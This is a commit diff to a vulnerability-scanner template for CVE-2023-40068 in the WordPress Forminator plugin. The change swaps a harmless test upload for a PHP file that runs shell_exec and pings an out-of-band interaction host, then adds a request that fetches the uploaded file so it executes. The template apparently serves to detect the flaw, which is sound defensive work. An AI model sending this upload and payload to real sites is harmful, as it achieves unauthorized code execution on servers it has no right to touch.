Changed template like the script

2023-09-13 09:24:47 +02:00 · 2023-09-13 09:24:47 +02:00 · 8fe5780891
parent 151d5e4dcf
commit 8fe5780891
1 changed files with 12 additions and 11 deletions
--- a/http/cves/2023/CVE-2023-40068.yaml
+++ b/http/cves/2023/CVE-2023-40068.yaml
@ -10,6 +10,7 @@ info:
    - https://www.exploit-db.com/exploits/51664
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
    - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
+    - https://github.com/E1A/CVE-2023-4596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -33,10 +34,16 @@ http:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe

        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
-        Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php"
+        Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}"
        Content-Type: application/x-php

-        test
+        <?php
+        $domain = "{{interactsh-url}}";
+        $ip = gethostbyname($domain);
+        $command = "ping -c 4 " . $ip;
+        $output = shell_exec($command);
+        echo "<pre>$output</pre>";
+        ?>
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="forminator_nonce"

@ -54,15 +61,9 @@ http:

        forminator_submit_form_custom-forms

-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - extension is not allowed.
-
-      - type: status
-        status:
-          - 200
+      - |
+        GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}

    extractors:
      - type: regex